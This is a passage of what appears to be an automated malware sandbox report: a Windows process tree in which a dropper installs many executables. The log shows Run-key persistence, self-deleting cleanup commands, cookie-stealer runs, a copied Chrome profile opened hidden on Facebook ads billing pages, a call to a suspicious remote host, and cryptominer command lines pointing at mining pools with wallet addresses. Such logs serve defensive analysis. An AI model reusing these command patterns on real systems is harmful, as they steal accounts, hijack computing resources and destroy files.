C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit13⤵PID:2740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f14⤵
- Kills process with taskkill
PID:5588
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 614⤵
- Delays execution with timeout.exe
PID:3444
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6452 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:7060
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:504
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"11⤵
- Executes dropped EXE
PID:6500 -
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 1 3.1617987577.607087f9defe7 10313⤵
- Executes dropped EXE
- Adds Run key to start application
PID:7024 -
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 2 3.1617987577.607087f9defe714⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:6596 -
C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe"C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe" /8-2315⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe"C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe" /8-2316⤵
- Modifies data under HKEY_USERS
PID:6244
-
-
-
C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe"C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe" /silent /subid=48215⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\is-G7IJU.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-G7IJU.tmp\vpn.tmp" /SL5="$20450,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe" /silent /subid=48216⤵
- Loads dropped DLL
PID:6888
-
-
-
C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe" /Verysilent /subid=57715⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\is-KCIEU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KCIEU.tmp\Setup3310.tmp" /SL5="$20334,138429,56832,C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
PID:6940 -
C:\Users\Admin\AppData\Local\Temp\is-PEC0D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PEC0D.tmp\Setup.exe" /Verysilent17⤵PID:7964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq15⤵PID:7192
-
C:\Users\Admin\AppData\Local\Temp\is-AK6D6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-AK6D6.tmp\IBInstaller_97039.tmp" /SL5="$B03A8,9978391,721408,C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq16⤵PID:7036
-
C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler"17⤵PID:2128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler.exe"18⤵PID:4772
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 419⤵
- Runs ping.exe
PID:7660
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:6072
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703917⤵PID:7444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe"C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe" /ustwo INSTALL15⤵PID:7144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "savt15kynqx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe" & exit16⤵PID:4752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "savt15kynqx.exe" /f17⤵
- Kills process with taskkill
PID:2356
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe"C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe" ll12⤵
- Executes dropped EXE
PID:6424 -
C:\Users\Admin\AppData\Local\Temp\is-UJ7S4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UJ7S4.tmp\setups.tmp" /SL5="$20558,1873631,71168,C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe" ll13⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6492 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:7012
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6792
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
PID:6508 -
C:\Users\Admin\AppData\Local\Temp\is-UUUBH.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UUUBH.tmp\LabPicV3.tmp" /SL5="$1055A,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6652 -
C:\Users\Admin\AppData\Local\Temp\is-0FMS1.tmp\alpATCHInO.exe"C:\Users\Admin\AppData\Local\Temp\is-0FMS1.tmp\alpATCHInO.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:5820 -
C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe"C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:6636 -
C:\Users\Admin\AppData\Local\Temp\is-F8FI6.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-F8FI6.tmp\prolab.tmp" /SL5="$20570,575243,216576,C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5312
-
-
-
C:\Users\Admin\AppData\Local\Temp\b8-2e6c7-8fb-5a6b1-d41558dfc22e2\Geqymilace.exe"C:\Users\Admin\AppData\Local\Temp\b8-2e6c7-8fb-5a6b1-d41558dfc22e2\Geqymilace.exe"14⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5180 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 207615⤵
- Executes dropped EXE
PID:6608
-
-
-
C:\Users\Admin\AppData\Local\Temp\67-9314c-05b-4e0bc-6835297b908c2\Lyjylokulae.exe"C:\Users\Admin\AppData\Local\Temp\67-9314c-05b-4e0bc-6835297b908c2\Lyjylokulae.exe"14⤵
- Executes dropped EXE
PID:4800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exe & exit15⤵PID:8152
-
C:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exeC:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exe16⤵PID:7884
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7688
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:2240
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exe & exit15⤵PID:7632
-
C:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exeC:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:6928 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:7772
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exe & exit15⤵PID:8176
-
C:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exe16⤵
- Checks whether UAC is enabled
PID:4908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe & exit15⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe16⤵PID:7440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:5692
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:1116
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:7064
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exe & exit15⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exe16⤵PID:7828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\te05nyxn.1zk\GcleanerWW.exe /mixone & exit15⤵PID:3912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exe & exit15⤵PID:8880
-
C:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exe16⤵PID:8984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exe & exit15⤵PID:9068
-
C:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exeC:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exe16⤵PID:9116
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:8956
-
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
PID:8448 -
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 1 3.1617987891.6070893357afd 10119⤵
- Adds Run key to start application
PID:4872 -
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 2 3.1617987891.6070893357afd20⤵
- Checks for any installed AV software in registry
PID:8416 -
C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe" /Verysilent /subid=57721⤵PID:9664
-
C:\Users\Admin\AppData\Local\Temp\is-NVP6S.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NVP6S.tmp\Setup3310.tmp" /SL5="$409FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe" /Verysilent /subid=57722⤵PID:9760
-
C:\Users\Admin\AppData\Local\Temp\is-L73EC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L73EC.tmp\Setup.exe" /Verysilent23⤵PID:8548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe"C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe" /ustwo INSTALL21⤵PID:9804
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "hkqir3xr5e5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe" & exit22⤵PID:9480
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "hkqir3xr5e5.exe" /f23⤵
- Kills process with taskkill
PID:9736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe" /8-2321⤵PID:9868
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe" /8-2322⤵
- Modifies data under HKEY_USERS
PID:6640
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe"C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe" ll18⤵PID:8828
-
C:\Users\Admin\AppData\Local\Temp\is-FPBPB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-FPBPB.tmp\setups.tmp" /SL5="$10968,1873631,71168,C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe" ll19⤵
- Checks computer location settings
PID:8948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe"17⤵
- Suspicious use of SetWindowsHookEx
PID:8372 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install18⤵PID:4068
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:6128
-
C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"18⤵
- Suspicious use of SetThreadContext
PID:7696 -
C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"19⤵
- Checks whether UAC is enabled
- Checks processor information in registry
PID:8544
-
-
-
C:\Users\Admin\AppData\Roaming\7FA9.tmp.exe"C:\Users\Admin\AppData\Roaming\7FA9.tmp.exe"18⤵PID:8024
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23611 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:9252
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w32756@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:9556
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:8336
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:6408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:8852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8852 -s 462018⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6652
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exe & exit15⤵PID:9192
-
C:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exeC:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exe16⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious behavior: MapViewOfSection
PID:6584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe /8-2222 & exit15⤵PID:8952
-
C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exeC:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe /8-222216⤵PID:7268
-
C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe"C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe" /8-222217⤵
- Modifies data under HKEY_USERS
PID:9672
-
-
-
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
PID:6484
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"11⤵PID:6608
-
C:\Users\Admin\AppData\Local\Temp\is-0OK41.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OK41.tmp\lylal220.tmp" /SL5="$1055E,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6708 -
C:\Users\Admin\AppData\Local\Temp\is-LV91D.tmp\ysAGEL.exe"C:\Users\Admin\AppData\Local\Temp\is-LV91D.tmp\ysAGEL.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:7140 -
C:\Program Files\Common Files\UJCHJUYILS\irecord.exe"C:\Program Files\Common Files\UJCHJUYILS\irecord.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\is-5SE7S.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-5SE7S.tmp\irecord.tmp" /SL5="$1058A,5922518,66560,C:\Program Files\Common Files\UJCHJUYILS\irecord.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6532 -
C:\Program Files (x86)\i-record\i-record.exe"C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fe-bd7e5-d1a-514af-929c0da9e6ecc\Naebuvulaene.exe"C:\Users\Admin\AppData\Local\Temp\fe-bd7e5-d1a-514af-929c0da9e6ecc\Naebuvulaene.exe"14⤵
- Executes dropped EXE
PID:5580 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 220015⤵PID:7232
-
-
-
C:\Users\Admin\AppData\Local\Temp\8d-fd1b5-93a-0a7a0-4cfe0c0b94481\Gaesojahure.exe"C:\Users\Admin\AppData\Local\Temp\8d-fd1b5-93a-0a7a0-4cfe0c0b94481\Gaesojahure.exe"14⤵
- Executes dropped EXE
PID:5264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exe & exit15⤵PID:7988
-
C:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exeC:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exe16⤵
- Executes dropped EXE
PID:6232 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7844
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5384
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exe & exit15⤵
- Executes dropped EXE
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exeC:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:8068 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:2612
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exe & exit15⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exe16⤵PID:8044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe & exit15⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe16⤵
- Checks processor information in registry
PID:8008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:4456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:2240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:4804
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:6012
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exe & exit15⤵PID:7420
-
C:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exe16⤵PID:6368
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6136
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:7360
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵
- Enumerates system info in registry
PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵PID:7772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff909f96e00,0x7ff909f96e10,0x7ff909f96e2018⤵PID:8104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,12176870085335734753,3984848402317032022,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1616 /prefetch:818⤵PID:1628
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tt2vtewb.vwx\GcleanerWW.exe /mixone & exit15⤵PID:6460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exe & exit15⤵PID:9912
-
C:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
PID:9892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exe & exit15⤵PID:8836
-
C:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exeC:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exe16⤵PID:2904
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"17⤵PID:9144
-
C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
PID:5660 -
C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 1 3.1617987939.60708963c6c65 10119⤵
- Adds Run key to start application
PID:1972 -
